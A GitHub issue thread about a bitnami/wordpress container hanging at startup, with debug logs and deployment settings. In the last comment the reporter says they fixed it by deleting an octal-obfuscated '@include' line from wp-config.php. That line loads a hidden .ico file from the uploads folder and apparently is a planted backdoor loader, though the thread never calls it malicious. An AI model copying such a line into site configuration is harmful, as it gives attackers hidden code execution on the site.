### ISSUE TITLE
wordpress fails to load after updating image

### ISSUE THREAD

**Issue by patricklx** [bitnami/containers#22470]
### Name and Version

bitnami/wordpress:latest

### What steps will reproduce the bug?
```
wordpress 14:47:29.54 INFO  ==> Configuring Apache ServerTokens directive
wordpress 14:47:29.54 DEBUG ==> Configuring ServerTokens Prod on file /opt/bitnami/apache/conf/httpd.conf
wordpress 14:47:29.72 INFO  ==> Configuring PHP options
wordpress 14:47:29.79 INFO  ==> Setting PHP expose_php option
wordpress 14:47:30.00 INFO  ==> Validating settings in MYSQL_CLIENT_* env vars
wordpress 14:47:30.41 DEBUG ==> Validating settings in WORDPRESS_* environment variables...
wordpress 14:47:33.44 INFO  ==> Restoring persisted WordPress installation
wordpress 14:47:38.70 INFO  ==> Trying to connect to the database server
wordpress 14:47:38.70 DEBUG ==> Getting DB_NAME from WordPress configuration
```
### What is the expected behavior?

it should load

### What do you see instead?

it hangs trying to get a configuration

**Comment by carrodher** [comment]
Could you provide more info about how are you deploying the Wordpress container?

**Comment by patricklx** [comment]
its part of a docker swarm deployment.
the env variables are the following:
```
BITNAMI_DEBUG=true
WORDPRESS_DATABASE_HOST=mariadb
WORDPRESS_DATABASE_NAME=wordpress
WORDPRESS_DATABASE_PASSWORD=xxx
WORDPRESS_DATABASE_PORT_NUMBER=3306
WORDPRESS_DATABASE_USER=wordpress
WORDPRESS_OVERRIDE_DATABASE_SETTINGS=true
```
also local volume mounted on `/bitnami/wordpress`

**Comment by patricklx** [comment]
i was able to fix it. i somehow had this in the w-config.php file: `@include ("\057opt/\142itna\155i/wo\162dpre\163s/wp\055cont\145nt/u\160load\163/201\063/.8e\0665134\141.ico");`
i removed it and then wordpress was able to load
